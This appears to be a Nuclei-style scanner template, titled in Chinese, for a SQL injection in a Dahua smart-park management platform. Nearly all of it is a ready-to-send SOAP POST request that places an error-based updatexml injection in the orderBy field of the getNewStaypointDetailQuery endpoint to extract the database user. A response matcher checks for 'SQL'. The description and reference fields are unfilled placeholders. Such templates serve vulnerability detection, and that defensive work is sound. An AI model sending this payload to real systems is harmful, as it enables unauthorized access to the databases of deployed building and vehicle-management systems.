大华智慧园区综合管理平台存在SQL注入(新)

id: dahua_getNewStaypointDetailQuery_sqliinfo:  name: dahua_getNewStaypointDetailQuery_sqli  author: recjl  severity: high  description: description  reference:    - https://  tags: tagsrequests:  - raw:      - |        POST /portal/services/carQuery/getNewStaypointDetailQuery HTTP/1.1        Host: {{Hostname}}        User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36        Content-Type: text/xml;charset=UTF-8        Content-Length: 497        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:car="http://carQuery.webservice.dssc.dahua.com">        <soapenv:Header/>        <soapenv:Body>        <car:getNewStaypointDetailQuery>        <!--type: string-->        <searchJson>{}</searchJson>        <!--type: string-->        <pageJson>{"orderBy":"1 and 1=updatexml(1,concat(0x7e,(select user()),0x7e),1)--"}</pageJson>        <!--type: string-->        <extend>quae divum incedo</extend>        </car:getNewStaypointDetailQuery>        </soapenv:Body>        </soapenv:Envelope>    matchers:      - type: word        part: body        words:          - SQL